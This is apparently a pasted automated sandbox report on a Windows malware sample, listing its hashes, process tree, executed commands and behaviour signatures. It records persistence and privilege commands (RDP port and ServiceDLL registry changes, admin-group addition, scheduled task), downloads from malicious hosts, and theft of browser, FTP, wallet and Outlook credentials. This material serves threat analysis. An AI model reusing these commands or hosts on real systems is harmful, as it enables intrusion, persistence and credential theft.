paladin316

Exes_d8ae6aedb4b5dae2f0f6e8a99a856058_exe_2019-08-02_22_30.txt

Aug 2nd, 2019
2,199
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 67.34 KB | None | 0 0
  1.  
  2. * MalFamily: "Malicious"
  3.  
  4. * MalScore: 10.0
  5.  
  6. * File Name: "Exes_d8ae6aedb4b5dae2f0f6e8a99a856058.exe"
  7. * File Size: 657920
  8. * File Type: "PE32 executable (GUI) Intel 80386, for MS Windows"
  9. * SHA256: "a29f98da70e7ead1e68536d52f6b93b1cd8b8abb81b13de5ef6e68d1621112dd"
  10. * MD5: "d8ae6aedb4b5dae2f0f6e8a99a856058"
  11. * SHA1: "c723bd633463b08a79a47a8a84e6bc917362c3a3"
  12. * SHA512: "20db56971edfbd6515a030639f0cd4660e48cbc67a24249fe1bb30f83874bfb03243fe0c6c75bcd976e9975e31f0080e675bb3305c46ab53f6068020c53195f8"
  13. * CRC32: "23AF0722"
  14. * SSDEEP: "12288:/KjxdHFuROa5PxTmmNQIi167ENI3/w+gpn/:eHTYQN5T"
  15.  
  16. * Process Execution:
  17. "Exes_d8ae6aedb4b5dae2f0f6e8a99a856058.exe",
  18. "b548e1df..exe",
  19. "cmd.exe",
  20. "powershell.exe",
  21. "takeown.exe",
  22. "icacls.exe",
  23. "icacls.exe",
  24. "icacls.exe",
  25. "icacls.exe",
  26. "icacls.exe",
  27. "icacls.exe",
  28. "icacls.exe",
  29. "reg.exe",
  30. "reg.exe",
  31. "net.exe",
  32. "net1.exe",
  33. "cmd.exe",
  34. "cmd.exe",
  35. "services.exe",
  36. "svchost.exe",
  37. "WmiPrvSE.exe",
  38. "svchost.exe",
  39. "cmd.exe",
  40. "rundll32.exe",
  41. "svchost.exe",
  42. "svchost.exe",
  43. "svchost.exe",
  44. "rundll32.exe",
  45. "cmd.exe",
  46. "rundll32.exe",
  47. "cmd.exe",
  48. "updsvc.exe",
  49. "cmd.exe",
  50. "schtasks.exe",
  51. "taskhost.exe",
  52. "svchost.exe",
  53. "WerFault.exe",
  54. "wermgr.exe",
  55. "svchost.exe",
  56. "explorer.exe",
  57. "lsm.exe"
  58.  
  59.  
  60. * Executed Commands:
  61. "C:\\Users\\user\\AppData\\Local\\Temp\\b548e1df..exe ",
  62. "C:\\Windows\\system32\\lsass.exe",
  63. "C:\\Windows\\system32\\svchost.exe -k netsvcs",
  64. "C:\\Windows\\System32\\svchost.exe -k NetworkService",
  65. "C:\\Windows\\System32\\svchost.exe -k LocalSystemNetworkRestricted",
  66. "C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\tmp5212.dat, deployns",
  67. "taskhost.exe $(Arg0)",
  68. "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
  69. "\"C:\\Windows\\system32\\cmd.exe\" /C powershell -ExecutionPolicy Bypass -f C:\\Users\\user\\AppData\\Local\\Temp\\ZRWLYPDGEH.ps1",
  70. "powershell -ExecutionPolicy Bypass -f C:\\Users\\user\\AppData\\Local\\Temp\\ZRWLYPDGEH.ps1",
  71. "\"C:\\Windows\\system32\\takeown.exe\" /A /F rfxvmt.dll",
  72. "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /inheritance:d",
  73. "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /setowner \"NT SERVICE\\TrustedInstaller\"",
  74. "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /grant \"NT SERVICE\\TrustedInstaller:F\"",
  75. "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /remove \"NT AUTHORITY\\SYSTEM\"",
  76. "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /grant \"NT AUTHORITY\\SYSTEM:RX\"",
  77. "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /remove BUILTIN\\Administrators",
  78. "\"C:\\Windows\\system32\\icacls.exe\" rfxvmt.dll /grant BUILTIN\\Administrators:RX",
  79. "\"C:\\Windows\\system32\\reg.exe\" ADD \"HKLM\\System\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp\" /v PortNumber /t REG_DWORD /d 0x1C21 /f",
  80. "\"C:\\Windows\\system32\\reg.exe\" add HKLM\\system\\currentcontrolset\\services\\TermService\\parameters /v ServiceDLL /t REG_EXPAND_SZ /d %SystemRoot%\\help\\tmp5211.dat /f",
  81. "\"C:\\Windows\\system32\\net.exe\" localgroup Administrators \"NT AUTHORITY\\NETWORK SERVICE\" /add",
  82. "\"C:\\Windows\\system32\\cmd.exe\" /c del %temp%\\*.ps1 /f",
  83. "\"C:\\Windows\\system32\\cmd.exe\" /c del %temp%\\*.txt /f",
  84. "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding",
  85. "C:\\Windows\\system32\\net1 localgroup Administrators \"NT AUTHORITY\\NETWORK SERVICE\" /add",
  86. "cmd.exe /c rundll32.exe c:\\windows\\help\\tmp5212.dat, deployns",
  87. "rundll32.exe c:\\windows\\help\\tmp5212.dat, deployns",
  88. "cmd.exe /c C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\tmp5212.dat,, deployns ns launch",
  89. "C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\tmp5212.dat,, deployns ns launch",
  90. "cmd.exe /c start c:\\windows\\temp\\updsvc.exe",
  91. "cmd.exe /c schtasks /create /tn \"updsvc\" /tr \"c:\\windows\\temp\\updsvc.exe\" /sc onlogon /f",
  92. "C:\\Windows\\system32\\WerFault.exe -u -p 1976 -s 288",
  93. "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_82cb4fca2f0bf3fd7a75b67369b18e41a743e1_cab_05059592\"",
  94. "c:\\windows\\temp\\updsvc.exe",
  95. "schtasks /create /tn \"updsvc\" /tr \"c:\\windows\\temp\\updsvc.exe\" /sc onlogon /f",
  96. "\"c:\\windows\\temp\\GetUserLang.exe\""
  97.  
  98.  
  99. * Signatures Detected:
  100.  
  101. "Description": "At least one process apparently crashed during execution",
  102. "Details":
  103.  
  104.  
  105. "Description": "Enumerates user accounts on the system",
  106. "Details":
  107.  
  108. "Process": "Exes_d8ae6aedb4b5dae2f0f6e8a99a856058.exe (2996)"
  109.  
  110.  
  111.  
  112.  
  113. "Description": "Creates RWX memory",
  114. "Details":
  115.  
  116.  
  117. "Description": "Possible date expiration check, exits too soon after checking local time",
  118. "Details":
  119.  
  120. "process": "Exes_d8ae6aedb4b5dae2f0f6e8a99a856058.exe, PID 2996"
  121.  
  122.  
  123.  
  124.  
  125. "Description": "Attempts to connect to a dead IP:Port (7 unique times)",
  126. "Details":
  127.  
  128. "IP": "94.158.245.123:80"
  129.  
  130.  
  131. "IP": "8.249.45.254:80"
  132.  
  133.  
  134. "IP": "185.225.17.150:80"
  135.  
  136.  
  137. "IP": "94.158.245.123:443"
  138.  
  139.  
  140. "IP": "88.99.66.31:443"
  141.  
  142.  
  143. "IP": "185.225.17.66:443"
  144.  
  145.  
  146. "IP": "192.35.177.64:80"
  147.  
  148.  
  149.  
  150.  
  151. "Description": "Loads a driver",
  152. "Details":
  153.  
  154. "driver service name": "\\Registry\\Machine\\System\\CurrentControlSet\\Services\\RDPDR"
  155.  
  156.  
  157.  
  158.  
  159. "Description": "Expresses interest in specific running processes",
  160. "Details":
  161.  
  162. "process": "rundll32.exe"
  163.  
  164.  
  165. "process": "smss.exe"
  166.  
  167.  
  168. "process": "winlogon.exe"
  169.  
  170.  
  171. "process": "explorer.exe"
  172.  
  173.  
  174.  
  175.  
  176. "Description": "Repeatedly searches for a not-found process, may want to run with startbrowser=1 option",
  177. "Details":
  178.  
  179.  
  180. "Description": "Reads data out of its own binary image",
  181. "Details":
  182.  
  183. "self_read": "process: b548e1df..exe, pid: 2924, offset: 0x00000000, length: 0x002d0e00"
  184.  
  185.  
  186. "self_read": "process: b548e1df..exe, pid: 2924, offset: 0x00008c1c, length: 0x002da819"
  187.  
  188.  
  189. "self_read": "process: b548e1df..exe, pid: 2924, offset: 0x002d0e00, length: 0x00014276"
  190.  
  191.  
  192. "self_read": "process: b548e1df..exe, pid: 2924, offset: 0x002e3435, length: 0x00001c45"
  193.  
  194.  
  195.  
  196.  
  197. "Description": "A process created a hidden window",
  198. "Details":
  199.  
  200. "Process": "b548e1df..exe -> \"C:\\Windows\\system32\\cmd.exe\""
  201.  
  202.  
  203. "Process": "rundll32.exe -> cmd.exe"
  204.  
  205.  
  206. "Process": "rundll32.exe -> cmd.exe"
  207.  
  208.  
  209.  
  210.  
  211. "Description": "Drops a binary and executes it",
  212. "Details":
  213.  
  214. "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\b548e1df..exe"
  215.  
  216.  
  217. "binary": "C:\\Windows\\Temp\\updsvc.exe"
  218.  
  219.  
  220.  
  221.  
  222. "Description": "HTTP traffic contains suspicious features which may be indicative of malware related traffic",
  223. "Details":
  224.  
  225. "post_no_referer": "HTTP traffic contains a POST request with no referer header"
  226.  
  227.  
  228. "post_no_useragent": "HTTP traffic contains a POST request with no user-agent header"
  229.  
  230.  
  231. "get_no_useragent": "HTTP traffic contains a GET request with no user-agent header"
  232.  
  233.  
  234. "ip_hostname": "HTTP connection was made to an IP address rather than domain name"
  235.  
  236.  
  237. "suspicious_request": "http://zapor.xyz/Ywc42gFy1UbOpt3Z/conf.php"
  238.  
  239.  
  240. "suspicious_request": "http://185.225.17.245/wrk28.exe"
  241.  
  242.  
  243. "suspicious_request": "http://apps.identrust.com/roots/dstrootcax3.p7c"
  244.  
  245.  
  246. "suspicious_request": "http://kuarela.xyz/2.txt"
  247.  
  248.  
  249. "suspicious_request": "http://185.225.17.66:443/http://185.225.17.66/fakeurl.htm"
  250.  
  251.  
  252. "suspicious_request": "http://geo.netsupportsoftware.com/location/loca.asp"
  253.  
  254.  
  255.  
  256.  
  257. "Description": "Performs some HTTP requests",
  258. "Details":
  259.  
  260. "url": "http://zapor.xyz/Ywc42gFy1UbOpt3Z/conf.php"
  261.  
  262.  
  263. "url": "http://185.225.17.245/wrk28.exe"
  264.  
  265.  
  266. "url": "http://apps.identrust.com/roots/dstrootcax3.p7c"
  267.  
  268.  
  269. "url": "http://www.download.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab"
  270.  
  271.  
  272. "url": "http://kuarela.xyz/2.txt"
  273.  
  274.  
  275. "url": "http://185.225.17.66:443/http://185.225.17.66/fakeurl.htm"
  276.  
  277.  
  278. "url": "http://geo.netsupportsoftware.com/location/loca.asp"
  279.  
  280.  
  281.  
  282.  
  283. "Description": "The binary likely contains encrypted or compressed data.",
  284. "Details":
  285.  
  286. "section": "name: .rsrc, entropy: 7.16, characteristics: IMAGE_SCN_CNT_INITIALIZED_DATA|IMAGE_SCN_MEM_READ, raw_size: 0x0002b800, virtual_size: 0x0002b78c"
  287.  
  288.  
  289.  
  290.  
  291. "Description": "Tries to suspend Cuckoo threads to prevent logging of malicious activity",
  292. "Details":
  293.  
  294. "Process": "svchost.exe (2840)"
  295.  
  296.  
  297.  
  298.  
  299. "Description": "Attempts to stop active services",
  300. "Details":
  301.  
  302. "servicename": "UmRdpService"
  303.  
  304.  
  305.  
  306.  
  307. "Description": "A process attempted to delay the analysis task by a long amount of time.",
  308. "Details":
  309.  
  310. "Process": "lsm.exe tried to sleep 315 seconds, actually delayed analysis time by 0 seconds"
  311.  
  312.  
  313. "Process": "updsvc.exe tried to sleep 285 seconds, actually delayed analysis time by 0 seconds"
  314.  
  315.  
  316. "Process": "WmiPrvSE.exe tried to sleep 720 seconds, actually delayed analysis time by 0 seconds"
  317.  
  318.  
  319. "Process": "powershell.exe tried to sleep 301 seconds, actually delayed analysis time by 0 seconds"
  320.  
  321.  
  322. "Process": "svchost.exe tried to sleep 3750 seconds, actually delayed analysis time by 0 seconds"
  323.  
  324.  
  325.  
  326.  
  327. "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
  328. "Details":
  329.  
  330. "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 6687448 times"
  331.  
  332.  
  333.  
  334.  
  335. "Description": "Steals private information from local Internet browsers",
  336. "Details":
  337.  
  338. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
  339.  
  340.  
  341. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
  342.  
  343.  
  344. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
  345.  
  346.  
  347. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data"
  348.  
  349.  
  350. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
  351.  
  352.  
  353. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
  354.  
  355.  
  356. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
  357.  
  358.  
  359. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
  360.  
  361.  
  362. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
  363.  
  364.  
  365. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
  366.  
  367.  
  368. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Data"
  369.  
  370.  
  371. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
  372.  
  373.  
  374. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
  375.  
  376.  
  377. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
  378.  
  379.  
  380. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
  381.  
  382.  
  383. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History"
  384.  
  385.  
  386. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
  387.  
  388.  
  389. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
  390.  
  391.  
  392. "file": "C:\\Users\\user\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Cookies"
  393.  
  394.  
  395. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\[email protected]"
  396.  
  397.  
  398.  
  399.  
  400. "Description": "Attempts to execute a Living Off The Land Binary command for post exeploitation",
  401. "Details":
  402.  
  403. "MITRE T1078 - schtask": "(Tactic: Execution, Persistence, Privilege Escalation)"
  404.  
  405.  
  406.  
  407.  
  408. "Description": "Installs itself for autorun at Windows startup",
  409. "Details":
  410.  
  411. "service name": "SvcHlies33"
  412.  
  413.  
  414. "service path": "C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\tmp5212.dat, deployns "
  415.  
  416.  
  417. "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\SvcHlies33\\ImagePath"
  418.  
  419.  
  420. "data": "C:\\Windows\\system32\\rundll32.exe c:\\windows\\help\\tmp5212.dat, deployns "
  421.  
  422.  
  423. "key": "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\TermService\\Parameters\\ServiceDLL"
  424.  
  425.  
  426. "data": "%SystemRoot%\\help\\tmp5211.dat"
  427.  
  428.  
  429. "task": "cmd.exe /c schtasks /create /tn \"updsvc\" /tr \"c:\\windows\\temp\\updsvc.exe\" /sc onlogon /f"
  430.  
  431.  
  432.  
  433.  
  434. "Description": "Collects information about installed applications",
  435. "Details":
  436.  
  437. "Program": "Google Update Helper"
  438.  
  439.  
  440. "Program": "Microsoft Office Shared 64-bit MUI 2013"
  441.  
  442.  
  443.  
  444.  
  445. "Program": "Microsoft Excel MUI 2013"
  446.  
  447.  
  448. "Program": "Microsoft Outlook MUI 2013"
  449.  
  450.  
  451.  
  452.  
  453. "Program": "Google Chrome"
  454.  
  455.  
  456.  
  457.  
  458. "Program": "Adobe Flash Player 29 NPAPI"
  459.  
  460.  
  461. "Program": "Oracle VM VirtualBox Guest Additions 6.0.2"
  462.  
  463.  
  464. "Program": "Adobe Flash Player 29 ActiveX"
  465.  
  466.  
  467. "Program": "Microsoft DCF MUI 2013"
  468.  
  469.  
  470. "Program": "Microsoft Access MUI 2013"
  471.  
  472.  
  473. "Program": "Microsoft Office 64-bit Components 2013"
  474.  
  475.  
  476. "Program": "Java 8 Update 201"
  477.  
  478.  
  479. "Program": "Microsoft Office Proofing Tools 2013 - English"
  480.  
  481.  
  482. "Program": "Notepad++"
  483.  
  484.  
  485. "Program": "Adobe Acrobat Reader DC"
  486.  
  487.  
  488. "Program": "Microsoft Publisher MUI 2013"
  489.  
  490.  
  491.  
  492.  
  493. "Program": "Microsoft Office Shared MUI 2013"
  494.  
  495.  
  496. "Program": "Microsoft Office OSM MUI 2013"
  497.  
  498.  
  499.  
  500.  
  501. "Program": "Microsoft InfoPath MUI 2013"
  502.  
  503.  
  504. "Program": "Microsoft Office Shared Setup Metadata MUI 2013"
  505.  
  506.  
  507. "Program": "Outils de v\\xc3\\xa9rification linguistique 2013 de Microsoft Office\\xc2\\xa0- Fran\\xc3\\xa7ais"
  508.  
  509.  
  510. "Program": "Microsoft Word MUI 2013"
  511.  
  512.  
  513.  
  514.  
  515.  
  516.  
  517.  
  518.  
  519. "Program": "Microsoft Groove MUI 2013"
  520.  
  521.  
  522. "Program": "Microsoft Office Proofing Tools 2013 - Espa\\xc3\\xb1ol"
  523.  
  524.  
  525.  
  526.  
  527.  
  528.  
  529. "Program": "Microsoft Office Shared 64-bit Setup Metadata MUI 2013"
  530.  
  531.  
  532. "Program": "Microsoft Access Setup Metadata MUI 2013"
  533.  
  534.  
  535. "Program": "Microsoft Office OSM UX MUI 2013"
  536.  
  537.  
  538. "Program": "Java Auto Updater"
  539.  
  540.  
  541. "Program": "Microsoft PowerPoint MUI 2013"
  542.  
  543.  
  544. "Program": "Microsoft Office Professional Plus 2013"
  545.  
  546.  
  547. "Program": "Adobe Refresh Manager"
  548.  
  549.  
  550. "Program": "Microsoft Office Proofing 2013"
  551.  
  552.  
  553. "Program": "Microsoft Lync MUI 2013"
  554.  
  555.  
  556.  
  557.  
  558.  
  559.  
  560. "Program": "Microsoft OneNote MUI 2013"
  561.  
  562.  
  563.  
  564.  
  565. "Description": "Creates a hidden or system file",
  566. "Details":
  567.  
  568. "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF84d58d.TMP"
  569.  
  570.  
  571. "file": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft"
  572.  
  573.  
  574. "file": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache"
  575.  
  576.  
  577. "file": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData"
  578.  
  579.  
  580. "file": "C:\\Windows\\ServiceProfiles\\NetworkService\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\Content"
  581.  
  582.  
  583. "file": "C:\\Windows\\Temp\\client32.exe"
  584.  
  585.  
  586. "file": "C:\\Windows\\Temp\\HTCTL32.DLL"
  587.  
  588.  
  589. "file": "C:\\Windows\\Temp\\msvcr100.dll"
  590.  
  591.  
  592. "file": "C:\\Windows\\Temp\\nskbfltr.inf"
  593.  
  594.  
  595. "file": "C:\\Windows\\Temp\\NSM.ini"
  596.  
  597.  
  598. "file": "C:\\Windows\\Temp\\NSM.LIC"
  599.  
  600.  
  601. "file": "C:\\Windows\\Temp\\pcicapi.dll"
  602.  
  603.  
  604. "file": "C:\\Windows\\Temp\\PCICHEK.DLL"
  605.  
  606.  
  607. "file": "C:\\Windows\\Temp\\PCICL32.DLL"
  608.  
  609.  
  610. "file": "C:\\Windows\\Temp\\remcmdstub.exe"
  611.  
  612.  
  613. "file": "C:\\Windows\\Temp\\TCCTL32.DLL"
  614.  
  615.  
  616.  
  617.  
  618. "Description": "File has been identified by 15 Antiviruses on VirusTotal as malicious",
  619. "Details":
  620.  
  621. "FireEye": "Generic.mg.d8ae6aedb4b5dae2"
  622.  
  623.  
  624. "Qihoo-360": "HEUR/QVM10.1.F0DF.Malware.Gen"
  625.  
  626.  
  627. "Invincea": "heuristic"
  628.  
  629.  
  630. "Symantec": "ML.Attribute.HighConfidence"
  631.  
  632.  
  633. "APEX": "Malicious"
  634.  
  635.  
  636. "Paloalto": "generic.ml"
  637.  
  638.  
  639. "Kaspersky": "UDS:DangerousObject.Multi.Generic"
  640.  
  641.  
  642. "Rising": "[email protected] (RDML:s67vEPAO6jnnYgqo4Be9BQ)"
  643.  
  644.  
  645. "Endgame": "malicious (moderate confidence)"
  646.  
  647.  
  648. "TrendMicro": "Mal_HPGen-37b"
  649.  
  650.  
  651. "Microsoft": "Program:Win32/Unwaders.A!ml"
  652.  
  653.  
  654. "ZoneAlarm": "UDS:DangerousObject.Multi.Generic"
  655.  
  656.  
  657. "TrendMicro-HouseCall": "Mal_HPGen-37b"
  658.  
  659.  
  660. "Cybereason": "malicious.33463b"
  661.  
  662.  
  663. "CrowdStrike": "win/malicious_confidence_60% (D)"
  664.  
  665.  
  666.  
  667.  
  668. "Description": "Checks the system manufacturer, likely for anti-virtualization",
  669. "Details":
  670.  
  671.  
  672. "Description": "Detects VirtualBox through the presence of a registry key",
  673. "Details":
  674.  
  675.  
  676. "Description": "Attempts to access Bitcoin/ALTCoin wallets",
  677. "Details":
  678.  
  679. "file": "C:\\Users\\user\\AppData\\Roaming\\Electrum\\wallets\\*"
  680.  
  681.  
  682.  
  683.  
  684. "Description": "Harvests credentials from local FTP client softwares",
  685. "Details":
  686.  
  687. "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\sitemanager.xml"
  688.  
  689.  
  690. "file": "C:\\Users\\user\\AppData\\Roaming\\FileZilla\\recentservers.xml"
  691.  
  692.  
  693. "file": "C:\\Users\\user\\AppData\\Roaming\\SmartFTP\\Client 2.0\\Favorites\\*"
  694.  
  695.  
  696. "file": "C:\\Users\\user\\AppData\\Roaming\\Ipswitch\\WS_FTP\\Sites\\ws_ftp.ini"
  697.  
  698.  
  699.  
  700.  
  701. "Description": "Harvests information related to installed instant messenger clients",
  702. "Details":
  703.  
  704. "file": "C:\\Users\\user\\AppData\\Roaming\\.purple\\accounts.xml"
  705.  
  706.  
  707.  
  708.  
  709. "Description": "Harvests information related to installed mail clients",
  710. "Details":
  711.  
  712. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook"
  713.  
  714.  
  715. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\POP3 Password"
  716.  
  717.  
  718. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\0a0d020000000000c000000000000046"
  719.  
  720.  
  721. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9234ed9445f8fa418a542f350f18f326"
  722.  
  723.  
  724. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\POP3 Port"
  725.  
  726.  
  727. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\HTTP Server URL"
  728.  
  729.  
  730. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\IMAP User"
  731.  
  732.  
  733. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\cb23f8734d88734ca66c47c4527fd259"
  734.  
  735.  
  736. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\HTTP Password"
  737.  
  738.  
  739. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001"
  740.  
  741.  
  742. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\POP3 Server"
  743.  
  744.  
  745. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002"
  746.  
  747.  
  748. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\POP3 Server"
  749.  
  750.  
  751. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\IMAP Port"
  752.  
  753.  
  754. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\IMAP Port"
  755.  
  756.  
  757. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\SMTP User"
  758.  
  759.  
  760. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\IMAP Password"
  761.  
  762.  
  763. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\Email"
  764.  
  765.  
  766. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\8408552e6dae7d45a0ba01520b6221ff"
  767.  
  768.  
  769. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\SMTP Password"
  770.  
  771.  
  772. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9207f3e0a3b11019908b08002b2a56c2"
  773.  
  774.  
  775. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\240a97d961ed46428e29a3f1f1c23670"
  776.  
  777.  
  778. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\SMTP Server"
  779.  
  780.  
  781. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\c02ebc5353d9cd11975200aa004ae40e"
  782.  
  783.  
  784. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676"
  785.  
  786.  
  787. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\SMTP Password"
  788.  
  789.  
  790. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\IMAP User"
  791.  
  792.  
  793. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\POP3 User"
  794.  
  795.  
  796. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\b22783abb139fe46b0aad551d64b60e7"
  797.  
  798.  
  799. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\HTTP User"
  800.  
  801.  
  802. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\f86ed2903a4a11cfb57e524153480001"
  803.  
  804.  
  805. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Outlook\\Profiles\\Outlook"
  806.  
  807.  
  808. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000001\\IMAP Password"
  809.  
  810.  
  811. "key": "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\16.0\\Outlook\\Profiles\\Outlook\\9375CFF0413111d3B88A00104B2A6676\\00000002\\SMTP User"
  812.  
  813.  
